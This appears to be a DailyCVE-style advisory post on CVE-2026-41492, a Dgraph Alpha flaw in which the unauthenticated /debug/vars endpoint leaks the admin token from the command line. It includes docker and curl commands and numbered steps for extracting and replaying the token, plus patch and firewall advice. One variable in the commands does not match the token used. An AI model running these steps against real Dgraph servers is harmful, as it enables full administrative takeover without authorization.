Dgraph, Infoleak, CVE-2026-41492 (critical)

Listen to this Post

CVE-2026-41492: Unauthenticated token leakage through `/debug/vars`.

Vulnerable Dgraph Alpha endpoints expose process command-line arguments.

The `–security token=…` flag supplies the Alpha admin token at startup.

Go’s `expvar` package automatically registers `/debug/vars` on `http.DefaultServeMux`.

The `x/metrics.go` file imports expvar, and Conf = expvar.NewMap("dgraph_config").
The `expvar` handler includes `cmdline = os.Args` in its JSON output.

Run.go explicitly blocks the old `/debug/pprof/cmdline` path.

A `if r.URL.Path == “/debug/pprof/cmdline”` check returns a 404 error.
Other paths fall through to http.DefaultServeMux, which serves /debug/vars.
An unauthenticated GET request to `/debug/vars` retrieves the full cmdline.
The attacker parses the JSON to extract the admin token from the command line.
The admin token is sent in the `X-Dgraph-AuthToken` header for any admin request.

Admin.go reads `X-Dgraph-AuthToken` and compares it to `worker.Config.AuthToken`.

No other authentication is required for admin-access after token replay.

This bypass allows privileged actions on admin-only endpoints.

The complete exploit was verified on Dgraph v25.3.2 running in a Docker container.

dailycve form:

Platform: Dgraph Alpha
Version: v25.3.2
Vulnerability: Incomplete fix, `/debug/vars` leak
Severity: Critical
date: 2026-04-24

Prediction: 2026-04-24 (already patched)

What Undercode Say:

Download the vulnerable Dgraph version
docker pull dgraph/dgraph:v25.3.2
Simulate starting the Alpha node with a token
docker run -d -p 8080:8080 --name dgraph_alpha_vuln dgraph/dgraph:v25.3.2 dgraph alpha --security "token=MySecretAdminToken"
Exploit: Retrieve the cmdline from /debug/vars
curl http://localhost:8080/debug/vars | jq '.cmdline'
Extract the token, store it in a variable (manual extraction needed)
TOKEN="SecretToken"
Replay the token to access restricted admin endpoints
curl -H "X-Dgraph-AuthToken: MySecretAdminToken" http://localhost:8080/admin/config/cache_mb

Exploit:

  1. Send an unauthenticated GET request to `http://target:8080/debug/vars`.
  2. Parse the response JSON, locate the “cmdline” string, and extract the --security token=....
  3. Replay the extracted token in the `X-Dgraph-AuthToken` header for any admin-only endpoint.

Protection from this CVE:

Upgrade to Dgraph version `25.3.3` or higher.

Apply network access controls (e.g., a firewall) to restrict access to the Dgraph Alpha HTTP port (default 8080).
Use a reverse proxy to filter out paths like `/debug/vars` or implement allow-listing logic in the HTTP handler.

Impact:

Unauthenticated remote attackers can obtain the Alpha admin token, leading to full administrative account compromise. This enables reading sensitive configurations, modifying cluster settings, and performing any admin-gated action, effectively bypassing all authentication controls.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top